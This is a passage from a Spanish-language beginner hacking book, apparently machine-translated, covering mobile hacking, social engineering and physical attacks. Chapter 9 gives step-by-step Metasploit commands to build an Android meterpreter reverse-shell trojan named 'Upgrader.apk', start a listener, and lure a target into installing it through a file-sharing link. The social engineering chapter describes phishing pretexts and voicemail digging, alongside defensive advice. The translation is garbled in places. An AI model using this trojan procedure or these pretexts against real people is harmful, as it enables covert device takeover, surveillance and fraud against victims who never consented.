recibe, intercepta todo el tráfico o incluso inyecta el tráfico que desea que reciba. También puede crear un oyente directamente en
su sistema para obtener un control total.
Capítulo 9: Introducción a la piratería móvil

La piratería móvil tiene mucho sentido debido al aumento de teléfonos inteligentes y otros dispositivos móviles para transacciones en línea y para conectarse con

otros. Dado que los dispositivos móviles son centros de información personal a los que es más fácil acceder en comparación con las computadoras personales, se

encuentran entre los dispositivos más vulnerables para los piratas informáticos.

¿Por qué deberías hackear dispositivos móviles? Los diferentes tipos de piratería de dispositivos móviles le permiten hacer lo siguiente:

1. Conozca la ubicación de un objetivo a través del servicio GPS instalado o el seguimiento de ID de celda.

2. Acceda a correos electrónicos y grabe conversaciones telefónicas

3. Conozca el comportamiento de navegación en Internet del objetivo

4. Ver todos los contenidos almacenados en el dispositivo, incluidas las fotos

5. Enviar instrucciones remotas al dispositivo móvil

6. Úselo para enviar mensajes o llamadas falsas


Hackear aplicaciones móviles

Si piensas como un hacker, te darás cuenta de que una de las formas más fáciles de acceder a varios dispositivos móviles y configurar una tienda allí es
crear una aplicación móvil.

La piratería de aplicaciones móviles es una de las formas más rápidas de infiltrarse en un sistema de dispositivo móvil, ya que es fácil cargar una aplicación
maliciosa en línea y hacer posible que las personas descarguen el pirateo, sin siquiera pensar si deberían examinar su descarga o no. Las aplicaciones
móviles también son consideradas como "frutas bajas". Se puede acceder directamente a la mayoría de las aplicaciones móviles a través de sus códigos
binarios, o el código que los dispositivos móviles necesitan para ejecutar la aplicación. Eso significa que todos los que tienen en sus manos herramientas de
piratería comercializadas pueden explotar las aplicaciones móviles disponibles y convertirlas en herramientas de piratería. Una vez que los hackers puedan
comprometer una aplicación móvil, podrán realizar el compromiso inicial en cuestión de minutos.

Aquí hay algunas formas en que los hackers explotan códigos binarios en aplicaciones móviles:

1. Modificar el código para modificar el comportamiento

Cuando los piratas informáticos modifican el código binario, lo hacen para deshabilitar los controles de seguridad de la aplicación, los requisitos de
compra o los avisos para que se muestren los anuncios. Cuando pueden hacer eso, pueden distribuir la aplicación modificada como crack, una
nueva aplicación o un parche

2. Inyectar código malicioso

Cuando los piratas informáticos pueden obtener un código binario, pueden inyectar un código malicioso y luego distribuirlo como una actualización de

la aplicación o un parche. Hacer esto puede confundir a un usuario al pensar que simplemente está actualizando la aplicación en su dispositivo móvil,

pero en realidad, el hacker ha diseñado al usuario para que instale una aplicación completamente diferente.

3. Crear una aplicación maliciosa

Los piratas informáticos pueden realizar un ataque drive-by, que es posible mediante un enlace API / función o swizzling.
Cuando se hace esto, el hacker podrá comprometer con éxito la aplicación de destino y hacer posible la redirección del tráfico
o el robo de credenciales de usuario.

4. Hacer ingeniería inversa

Un pirata informático que tiene acceso a un código binario puede realizar fácilmente un truco de ingeniería inversa para exponer otras vulnerabilidades,

hacer aplicaciones falsificadas similares o incluso volver a enviarlo bajo una nueva marca.
Explotar un dispositivo móvil de forma remota

Kali Linux, un juego de herramientas conocido para explotar computadoras, es también una de las herramientas más eficientes para realizar un hack en un

dispositivo móvil. Siga estos pasos para realizar un hack remoto en un dispositivo móvil e instalar un archivo malicioso en un dispositivo de destino.

1. Tire hacia arriba de Kali Linux

Escriba el siguiente comando:

msfpayload android / meterpreter / reverse_tcp LHOST = [el dispositivo Dirección IP] R>
/root/Upgrader.apk

2. Tire hacia arriba de una nueva terminal

Mientras Kali crea su archivo, cargue otro terminal y cargue la consola de metasploit. Para hacer eso, ingrese el comando:

Msfconsole

3. Configurar el oyente

Una vez que metasploit esté activo, cargue el exploit multi-manejador ingresando el comando: use exploit / multi /

handler

Luego, cree la carga útil inversa escribiendo el siguiente comando: set payload android

/ meterpreter / reverse_tcp

A continuación, deberá configurar el tipo de host L para que pueda comenzar a recibir tráfico. Para hacerlo, escriba el siguiente comando:

establecer LHOST [dirección IP de su dispositivo]

4) Comienza el exploit

Ahora que tiene listo su oyente, ahora puede comenzar su exploit activando su oyente. Para hacer esto, escriba el

comando: Exploit

Si el archivo malicioso o el troyano que creó hace un tiempo está listo, cópielo de la carpeta raíz a su dispositivo móvil,
preferiblemente un teléfono Android. Luego, haga que ese archivo esté disponible cargándolo en cualquier sitio para compartir
archivos, como speedyshare o Dropbox. Envíe el enlace a su objetivo y pídale que instale la aplicación.
Una vez que el usuario objetivo haya instalado el archivo, ¡ahora puede recibir el tráfico que está recibiendo a través de su dispositivo
móvil!
Capítulo 10: Ingeniería social

La ingeniería social es uno de los hacks más importantes que se pueden realizar para violar los protocolos de seguridad. Sin embargo, no es
un hack que se realiza contra un sistema informático en sí mismo; en cambio, es un hack que se realiza contra personas, que puede ser el
eslabón más débil en una cadena de medidas de seguridad.

También conocida como "pirateo de personas", la ingeniería social es uno de los hacks más difíciles de lograr porque no es común que las
personas den información clasificada a un completo desconocido. Sin embargo, es posible que cualquier hacker experimentado simule ser alguien
en quien puede confiar para obtener acceso a documentos y contraseñas importantes. Todo lo que necesita un pirata informático criminal
experimentado para llevar a cabo una táctica de ingeniería social es obtener la información correcta sobre usted.
Ingeniería social como arte y ciencia

La lógica detrás de la ingeniería social es simple: puede ser fácil obtener toda la información y el acceso que uno necesita de
cualquier persona siempre que sepa cómo engañar a una persona para que le brinde los datos que necesita con la menor
resistencia posible. Al poder realizar un truco de ingeniería social, podrá tener acceso a un dispositivo, cuenta o aplicación a la que
necesita acceder para realizar hacks más grandes o secuestrar una identidad por completo. Eso significa que si eres capaz de
sacar una táctica de ingeniería social antes de intentar pasar por todas las otras tácticas de secuestro bajo tu manga, no necesitas
hacer un esfuerzo adicional para penetrar en un sistema. Para poner todo este concepto en términos más simples, la ingeniería
social es una forma de piratería que trata con la manipulación de las víctimas a través de la interacción social,

Lo que dificulta la ingeniería social es que se basa en gran medida en la capacidad de asegurar la confianza, que solo es posible al obtener la
confianza de alguien. Por esta razón, los piratas informáticos más exitosos son capaces de leer las posibles respuestas de una persona cada
vez que se activan para realizar cualquier acción en relación con su sistema de seguridad. Una vez que pueda hacer las predicciones correctas,
podrá obtener contraseñas y otros activos informáticos valiosos sin tener que usar demasiadas herramientas.

Dado que la ingeniería social se trata principalmente de psicología, puede considerar esta táctica como un arte y una ciencia. Esta táctica implica una gran
cantidad de creatividad y capacidad para descifrar el lenguaje no verbal de un dispositivo o propietario de la cuenta. Los expertos en ingeniería social pueden
compilar tácticas que parecen funcionar en contra de los usuarios de computadoras todo el tiempo.

Junto con otros tipos de hacks disponibles, te darás cuenta de que la ingeniería social es esa parte de los ataques más exitosos, y que los ataques
funcionan principalmente debido a alguna forma de truco mental realizado por un hacker. La ingeniería social hace posible que una persona
simplemente inicie sesión en su información personal en cualquier forma que vea, o abra libremente un archivo adjunto que tenga malware incorporado.

Debido a que el objetivo de la ingeniería social es engañar a alguien para que proporcione información que permita el acceso a datos más valiosos, esta
táctica de piratería le permitirá obtener casi cualquier cosa de un sistema objetivo. Lo que lo convierte en una buena táctica es que puede phishing para
obtener una puerta de acceso a la información que desea piratear de la mayoría de las personas que tienen acceso al sistema al que se dirige, desde
recepcionistas hasta personal de TI, con estos pasos:

1. Investigación

2. Creación de confianza.

3. Explotación de la relación mediante la comunicación con el individuo objetivo.

4. Usar información filtrada para obtener ganancias maliciosas

El arte y la ciencia detrás de la ingeniería social se crean debido a una sola verdad sobre la seguridad de la información: la seguridad
termina y comienza con el conocimiento del usuario sobre cómo se debe proteger un sistema. No importa cuán actualizado esté su
sistema de seguridad, nunca podrá proteger su red y su
dispositivos si hay un usuario de su parte que no es capaz de mantener información vital de posibles atacantes. Con este pensamiento
surge la idea de que una vez que un ingeniero social se da cuenta de quién debe ser el objetivo de la organización para obtener
información crítica necesaria para penetrar en el sistema, más vulnerable es la información valiosa de una organización.
Cómo sucede la ingeniería social

Si va a pensar como un ingeniero social, tendrá la idea de que las personas más vulnerables dentro de cualquier organización son aquellas que tienen más
probabilidades de revelar información con la menor resistencia posible. Con ese pensamiento, puede concentrarse fácilmente en recepcionistas, agentes de
centros de llamadas y otros que están capacitados para divulgar información a cualquiera que los solicite. Es seguro asumir que los siguientes son usuarios
finales que son lo suficientemente ingenuos como para pensar que pueden proporcionar información personal a aquellos que pretenden ser personal de
soporte técnico, supervisores o personas que pueden proporcionarles una recompensa por simplemente responder una pregunta que pueda filtrar la
respuesta a una pregunta de privacidad.

Dado que la ingeniería social se basa en gran medida en el comportamiento de los usuarios hacia la seguridad de la información, las personas que son más susceptibles

a los ataques son las siguientes:

1. Personas que divulgan demasiada información sobre sus vidas personales.

2. Personas que crean contraseñas con sus propios nombres, cumpleaños o el nombre de su mascota.

3. Personas que divulgan información sobre los dispositivos que están utilizando.

4. Las personas que usan las mismas contraseñas para casi todas las cuentas.

5. Personas que no aseguran físicamente sus propios dispositivos, o cualquier documento que pueda señalar detalles sobre los protocolos de
seguridad de la información

Siempre y cuando pueda obtener acceso a este tipo de personas, puede extraer fácilmente cualquier información que desee obtener sin tener que
gastar demasiado esfuerzo. Al poder ubicar este tipo de usuarios en cualquier organización, podrá obtener la mayor cantidad de datos valiosos
que pueda como si hubiera tenido acceso a todos los dispositivos específicos.
Tipos de ataques de ingeniería social

Estos son algunos de los ataques más comunes utilizados por los ingenieros sociales para obtener la información que desean de los usuarios:

1. Phishing

Una vez que un ingeniero social define el tipo de información que desea obtener de un usuario, comienza a recopilar tanta información
sobre un objetivo tanto como puede sin dar la alarma. Por ejemplo, si un ingeniero social quiere penetrar en el sistema de seguridad de
una organización, lo más probable es que necesite tener una lista de empleados que trabajan allí, algunos números de teléfono
utilizados internamente o un calendario de actividades utilizadas por la empresa. Usando toda esta información, puede lanzar un ataque
el día en que esté presente el menor personal de seguridad, hacer un ataque de ingeniero social contra personal clave a través de una
línea de comunicación que sea menos sospechosa.

Hay muchas maneras de cómo se puede hacer un ataque de phishing. Uno puede usar una cuenta de correo electrónico falsa o un número de
teléfono y pretender ser un supervisor que solicita una lista de contactos oficial. También se pueden ver las cuentas de redes sociales de una
organización específica y descubrir quién es el responsable de organizar los horarios de la empresa. Si un ingeniero social prefiere pasar menos
tiempo en su investigación, simplemente puede optar por pagar una verificación de antecedentes exhaustiva en línea de las personas
seleccionadas. Una vez que se recibe la información necesaria, un ingeniero social puede lanzar un ataque de phishing más completo

Una de las tácticas de ingeniería social más efectivas utilizadas por los piratas informáticos es llegar a un objetivo y pretender que la cuenta de
la víctima se ha visto comprometida. Al crear un sentido de urgencia, cualquier ingeniero social puede pretender ofrecer asistencia pidiendo
información vital como el apellido de soltera de la madre, la fecha de nacimiento, los protocolos de recuperación de la cuenta y la última
contraseña utilizada. Un objetivo sin pretensiones puede proporcionar todos estos datos sin siquiera verificar con quién está hablando, o si su
cuenta realmente ha sido violada.

2. Basurero de buceo

Si bien este método puede ser un poco complicado y arriesgado, buscar en los materiales de la empresa desechados puede ser una forma muy

efectiva de obtener información altamente confidencial. Como su nombre lo indica, esto a menudo implica hurgar en los contenedores de basura de

una organización, con la esperanza de encontrar documentos clave en la basura.

Este método es muy efectivo porque la mayoría de las personas creen que las cosas que tiran a la basura son seguras, y eso
incluye documentos que apuntan a sus domicilios, números de teléfono personales y documentos confidenciales. La gente
simplemente no cree que haya una gran cantidad de información disponible en los documentos que tiran después de haber
terminado con ella. Por esta razón, uno puede encontrar fácilmente lo siguiente en la papelera:

Organigramas
Lista de contraseñas

Informes

Impresiones por correo electrónico

Manuales para empleados Políticas de

seguridad interna Números de teléfono

Diagramas de red Notas de la reunión

Tenga en cuenta que hay varios ingenieros sociales dedicados que todavía encuentran valor en los documentos
triturados, ya que reconocen que el papeleo triturado contiene información que una organización no quiere que nadie
descubra. Con suficiente tiempo y cinta, cualquier hacker podrá reconstruir un documento descuidado desmenuzado.

3. Excavación del correo de voz

Esta es una táctica utilizada por los ingenieros sociales para descubrir detalles en profundidad y posiblemente información privada sobre un individuo

simplemente aprovechando la función de marcación por nombre incorporada en la mayoría de los mensajes de voz. Para tocar esta función, todo lo que

necesita es marcar 0 después de llamar al número de una empresa o justo después de llegar al buzón de un objetivo. Esto generalmente se hace después

del horario de oficina para asegurarse de que nadie en la organización esté disponible para responder la llamada.

El correo de voz generalmente contiene una gran cantidad de información privada, como los momentos en que una persona no está disponible, lo
cual es crucial cuando se trata de programar un ataque total. Algunos también usan la información que encuentran en los mensajes de correo de
voz para descubrir algunos detalles que pueden usar para hacerse pasar por estas personas y usar sus personalidades para lanzar un ataque.

Los ingenieros sociales pueden ocultar fácilmente su identidad y ubicación cada vez que utilizan los correos de voz utilizando servidores VoIP
como Asterisk para ingresar cualquier número de teléfono que deseen cuando llamen.

4. Comunicación activa con el objetivo

Uno de los medios más efectivos para obtener información a través de la ingeniería social es pedirle al objetivo la información
necesaria directamente. Para que esta táctica funcione, todo lo que un ingeniero social debe hacer es generar suficiente
confianza entre él y el objetivo para lograr la información que necesita sin encontrar resistencia.

Por ejemplo, un ingeniero social puede acercar a una víctima directamente al lugar donde está el sistema que quiere violar. Puede
asumir una identidad diferente, como un gerente o personal de TI, y proceder a hacer preguntas que pueden comprometer gravemente
la cuenta personal de una persona o revelar protocolos de seguridad de redes vitales. Es posible que se sorprenda de la gran cantidad
de información que puede obtener
fuera de la gente simplemente preguntando!

5. Spoofing

La tecnología facilita la ingeniería social simplemente enmascarando la identidad de uno para pretender ser alguien que los objetivos pueden identificar

como uno de los suyos. Puede solicitar fácilmente a un usuario que envíe cualquier tipo de información confidencial mediante la creación de un correo

electrónico profesional y de aspecto legítimo que solicite números de seguridad social, identificaciones de usuario e incluso contraseñas. Algunos usuarios

incluso ofrecen voluntariamente esta información altamente confidencial a cambio de una contraseña de Wi-Fi gratuita o un obsequio a cambio. Incluso

puede usar correos electrónicos falsificados para solicitar a un usuario que instale un parche en sus computadoras que puede servir como dispositivo de

escucha o virus.

Uno de los ataques más populares que utilizan este truco es el gusano LoveBug que los usuarios instalaron directamente en sus sistemas
simplemente abriendo un archivo adjunto en un correo electrónico que supuestamente revela la identidad de un admirador secreto. Si bien
puede parecer demasiado obvio que abrir un archivo adjunto de una persona que no conoce no tiene sentido, la gente cayó en esta trampa
de todos modos.
Lo que puedes hacer contra la ingeniería social

Aquí hay algunas cosas que puede hacer para evitar caer directamente en una trampa de ingeniería social, o minimizar cualquier daño causado por cualquier

ataque de ingeniería social:

1) Prevenir el punto único de falla

Cuanto más interdependientes sean sus cuentas, más vulnerable será a un ataque. Asegúrese de evitar poner todos sus
huevos en una sola canasta: no use una sola cuenta de correo electrónico al autenticar otras cuentas que esté usando, o use
un correo electrónico separado para la recuperación de la contraseña.

2) Utilice diferentes inicios de sesión para cada cuenta que esté utilizando y asegúrese de que su
las contraseñas son seguras

Asegúrese de no utilizar nunca una contraseña más de una vez. De manera similar, asegúrese de que también esté usando
contraseñas que son muy difíciles de adivinar.

3) Siempre use la autenticación de dos factores

Use otro dispositivo o cuenta cuando autentique sus cuentas; esto hace que sea más difícil para los ladrones secuestrar sus
cuentas.

4) Sea creativo al crear preguntas de seguridad

No busque las preguntas y respuestas obvias cuando se trata de crear preguntas de seguridad para sus cuentas. Procure que todas las
preguntas y respuestas de seguridad sean difíciles de adivinar.

5) Asegure sus credenciales bancarias

Si debe comprar en línea o dejar detalles bancarios en un sitio web para facilitar el acceso, verifique que verifique el protocolo de
seguridad del sitio web. En el mismo sentido, asegúrese de que no use tarjetas de débito al hacer una compra: una vez que un
ingeniero social descubre su información bancaria, le resulta mucho más fácil vaciar toda su cuenta bancaria una vez que lanza una
cuenta efectiva ataque de suplantación de identidad.

6) Siempre preste atención a sus datos personales y a las cuentas que está utilizando.

Procure que verifique regularmente las actividades en todas sus cuentas. Si tiene una cuenta de redes sociales que ya no está utilizando,
elimínela para evitar dejar una cuenta vulnerable que posiblemente pueda ser violada, ya que no la está verificando activamente de vez en
cuando. Al mismo tiempo, verifique que también verifique todas las cuentas bancarias en línea y correos electrónicos regularmente para ver
si hay alguna actividad sospechosa o intento de phishing realizado.
7) Asegúrese de que su información se elimine de las bases de datos públicas

Las bases de datos públicas son un rico centro de información para los piratas informáticos, aunque puede pensar que ser encontrado en línea es bueno

para las redes personales, todos los detalles que deja en la World Wide Web permiten a los ingenieros sociales identificarlo como un objetivo. Por esta

razón, asegúrese de mantener toda la información personal, como la ubicación de la oficina, los números de teléfono e incluso las direcciones de correo

electrónico fuera de la vista de un pirata informático.

8) Sé responsable de tu basura digital.

Si necesita tirar cualquier artículo que pueda contener información sobre usted, asegúrese de que se destruya por completo para evitar
cualquier ataque de ingeniería social a través del buceo en el contenedor.

La mejor manera de evitar ser atacado por los ingenieros sociales es tener un escepticismo saludable y ejercer vigilancia, especialmente cuando se
le pide que brinde información privada. Recuerde que siempre que se le solicite completar un formulario o incluso proporcionar un detalle
aparentemente no confidencial a alguien, a menos que pueda verificar la identidad de la persona que se está comunicando con usted. Al mismo
tiempo, recuerde que incluso los gerentes, el personal de TI o los compañeros de trabajo no deben saber cuáles son sus contraseñas.

Tenga la misma precaución cuando brinde acceso a sus dispositivos o en cualquier lugar cerca del sistema que desee proteger.
Asegúrese de que todas las personas que se acerquen a sus teléfonos, tabletas o estaciones de trabajo sean personas que conozca.
Capítulo 11: Ataques físicos

Si bien la ingeniería social es una táctica ampliamente utilizada por los piratas informáticos para obtener información manipulando a un usuario para que
revele información personal, un ataque físico es una forma aún más astuta de obtener acceso a un sistema. Este ataque implica obtener acceso físico a un
dispositivo para robar o comprometer datos para beneficio personal.
Por qué funcionan los ataques físicos

La mayoría de las personas en seguridad de la tecnología de la información creen que, siempre y cuando hayan salvaguardado sus redes, ejecuten una
serie de escaneos en un día o se aseguren de tener el software adecuado, están a salvo de cualquier ataque. Sin embargo, esta creencia puede causar
muchos problemas cuando se trata de proteger un sistema completo de piratería. Como hay demasiado personal de TI que cree que su trabajo es
asegurarse de que realizan los escaneos correctos en un día, es posible que nunca prevean un ataque físico.

Un sistema puede sufrir un ataque físico intencional cuando un usuario deshonesto obtiene acceso a un dispositivo protegido y procede a realizar
un ataque. Mientras un pirata informático tenga acceso físico a cualquier cosa que tenga una computadora o un programa informático, puede
garantizar que habrá una gran pérdida por parte de la víctima.

Si bien un ataque físico puede parecer demasiado arriesgado, funciona como el truco de la vieja escuela de abrir cerraduras: una vez que puede pasar
una seguridad física, puede instalar fácilmente un dispositivo de escucha y acceder a un símbolo del sistema remoto que le permitirá controlar el
sistema informático de un dispositivo desde una distancia segura, piratear otros dispositivos conectados a él y mucho más.
Descubriendo vulnerabilidades

Un ataque físico es un ataque que casi siempre está garantizado para funcionar, y solo le tomará a un pirata informático hábil unos
minutos tener control completo sobre un dispositivo u obtener los datos que necesita de un sistema al que pueda acceder. Por esa
razón, es muy importante que conozca las posibles vulnerabilidades físicas del sistema que está protegiendo.

Observe estos factores cuando busque vulnerabilidades físicas:

1. Número de sitios o edificios que contienen sistemas que necesita proteger

2. Número de empleados y su acceso a dispositivos o periféricos informáticos.

3. Número de entradas y salidas en el edificio y posibles puntos de acceso a los dispositivos.

4. Ubicación de los centros de datos en el edificio, así como otros posibles centros de información confidencial.

5. Número y ubicación de dispositivos o periféricos informáticos que están interconectados entre sí.

Cuando eche un vistazo a la lista anterior, posiblemente pueda imaginar que pueden ocurrir miles de posibles violaciones de la
seguridad física. Si puede pensar en cómo un posible perpetrador puede obtener acceso físico a una sola parte del sistema informático
que tiene la intención de proteger, entonces es muy posible que los piratas informáticos criminales piensen lo mismo.
Asegurando la periferia

Para garantizar la seguridad física de sus dispositivos, asegúrese de minimizar o evitar estas vulnerabilidades:

1. Falta de monitoreo sobre quién entra y sale del edificio

2. No escoltas o visitantes inician sesión para acceder al edificio

3. Empleados que permiten a los visitantes acceder de inmediato al edificio cuando se les dice que trabajan para la oficina o para un vendedor

4. Falta de controles de acceso a la puerta o uso de llaves que pueden duplicarse fácilmente

5. Centro de datos basado en IP, video, control de acceso y administración de centros de datos a los que se puede acceder con una sola identificación de usuario

o contraseña

6. Salas de computadoras sin restricción de acceso

7. Software o archivos de medios que cualquiera puede recoger fácilmente

8. Información confidencial en documentos o discos en la basura que no se tritura cuidadosamente

9. Hardware no asegurado, como computadoras portátiles, fotocopiadoras, teléfonos o tabletas

Cuando una o dos de estas vulnerabilidades están presentes, puede estar seguro de que el sistema que desea proteger es muy propenso a
un ataque físico. Para evitar que esto suceda, deberá asegurarse de que todos los documentos, dispositivos o centros de información que
proporcionen más detalles sobre las vulnerabilidades de su sistema estén protegidos.

También tiene sentido proteger el sistema limitando el acceso a cuentas y sistemas de administrador; asegúrese de que las claves y contraseñas no
sean accesibles para todos los usuarios. También asegúrese de verificar de manera rutinaria todos los dispositivos a los que se ha accedido y ver si hay
cambios realizados tanto en el software como en el hardware.

Tenga en cuenta que los ataques físicos pueden ocurrir con el paso del tiempo: un empleado deshonesto puede estar implantando lentamente dispositivos de

escucha o debilitando los protocolos de seguridad para que las autoridades no se den cuenta de inmediato cuando algo está sucediendo.
Conclusión

¡Gracias por leer este libro!

Espero que este libro te haya ayudado a comprender diferentes conceptos de piratería, realizar pruebas en tu sistema y aprender a
detectar y prevenir posibles ataques. También espero que haya aprendido a diagnosticar su sistema ante cualquier posible vulnerabilidad
al comprenderlo mejor. Al poder hacer todo esto, lo ayudará a pensar un paso por delante de un hacker criminal.

El siguiente paso es aprender técnicas de piratería más avanzadas, como ataques de hombre en el medio más complejos, ataques
DDoS persistentes avanzados y otros ataques remotos. También querrás aprender cómo crear tus propios scripts que te ayudarán a
crear tus propios hacks. En el mismo sentido, también debe asegurarse de que todo el sistema esté mapeado y asegurado, y que
haya descubierto formas de proteger físicamente sus dispositivos de la ingeniería social y los ataques físicos.

Finalmente, si disfrutaste leyendo este libro, tómate el tiempo de visitar Amazon.com para dejar tu calificación y comentario.
¡Espero tener noticias suyas pronto!

También podría gustarte